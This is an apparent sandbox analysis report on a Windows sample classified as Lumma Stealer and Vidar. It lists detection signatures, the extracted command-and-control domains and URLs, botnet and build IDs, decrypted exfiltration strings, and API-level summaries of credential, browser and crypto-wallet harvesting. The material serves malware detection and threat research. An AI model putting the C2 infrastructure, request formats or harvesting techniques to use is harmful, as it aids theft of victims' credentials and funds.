Windows Analysis Report
f1r6P3j3g7.exe

Overview

General Information

Sample name: f1r6P3j3g7.exe
(renamed because the original name is a hash value)
Original sample name: 8351aa212d7278c381ebe13f2a435ad9.exe
Analysis ID: 1528299
MD5: 8351aa212d7278c381ebe13f2a435ad9
SHA1: d529652f0ba92febad36c66a1b5be4398eddaef2
SHA256: a86c7b65a6348d392d10d3982b6d0b896fdf646b218903a012d3c0dd73159f5b
Tags: 32exetrojan

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been sold through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, then steals further sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that can deliver additional payloads as EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a stealer forked from Arkei. It appears to be one of the first stealers to collect information from 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: f1r6P3j3g7.exe Avira: detected
Source: https://steamcommunity.com/profiles/76561199780418869 URL Reputation: Label: malware
Source: https://t.me/ae5ed URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\ProgramData\KEGIDHJKKJ.exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e694b6d50199ea44207a97e25dda5506"}
Source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["isoplethui.sbs", "frizzettei.sbs", "laddyirekyi.sbs", "invinjurhey.sbs", "bemuzzeki.sbs", "exilepolsiy.sbs", "exemplarou.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\KEGIDHJKKJ.exe Joe Sandbox ML: detected
Source: f1r6P3j3g7.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: wickedneatr.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: invinjurhey.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: laddyirekyi.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exilepolsiy.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: bemuzzeki.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: isoplethui.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: frizzettei.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 3_2_6CBB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD044C0 PK11_PubEncrypt, 3_2_6CD044C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD04440 PK11_PrivDecrypt, 3_2_6CD04440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 3_2_6CCD4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 3_2_6CD525B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 3_2_6CCEE6E0
Source: f1r6P3j3g7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2
Source: f1r6P3j3g7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_00909ABF FindFirstFileExW, 0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D19ABF FindFirstFileExW, 10_2_00D19ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_0091E385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 3_2_004014AD
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 10_2_00D5A0B9
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx ebx, word ptr [ecx] 10_2_00D58051
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 10_2_00D482E8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 10_2_00D743F8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [eax], cx 10_2_00D4A3BF
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 10_2_00D6E318
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 10_2_00D745E8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 10_2_00D68528
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 10_2_00D5A687
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [eax], cx 10_2_00D5665F
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, ebx 10_2_00D4264D
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D72601
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 10_2_00D707F8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 10_2_00D4C89C
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 10_2_00D768A8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp dword ptr [0044FDB4h] 10_2_00D42849
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 10_2_00D4A86A
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_00D60813
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp eax 10_2_00D3E9A5
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp eax 10_2_00D3E914
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 10_2_00D6093D
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 10_2_00D32928
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 10_2_00D54AD8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 10_2_00D3EAC6
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+000006B8h] 10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 10_2_00D76A38
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_00D60B43
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 10_2_00D3CB78
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh 10_2_00D6CB36
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov byte ptr [edi], al 10_2_00D60B22
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 10_2_00D5AC81
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D52D48
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 10_2_00D3ED6B
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [eax], cx 10_2_00D54D38
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp eax 10_2_00D56EC4
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [edx], 0000h 10_2_00D4CEB7
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp ecx 10_2_00D72EAE
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D6CE48
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 10_2_00D40F6F
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp ecx 10_2_00D72F6C
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+14h] 10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 10_2_00D5CF30
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov ebp, eax 10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [eax], dx 10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [esi], ax 10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 10_2_00D73290
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 10_2_00D5F2B8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 10_2_00D73390
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 10_2_00D593AF
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 10_2_00D4340E
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [eax], dx 10_2_00D4F540
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 10_2_00D5B56A
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 10_2_00D736C7
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 10_2_00D31878
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h 10_2_00D73833
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 10_2_00D55824
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 10_2_00D5DA58
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp eax 10_2_00D57B48
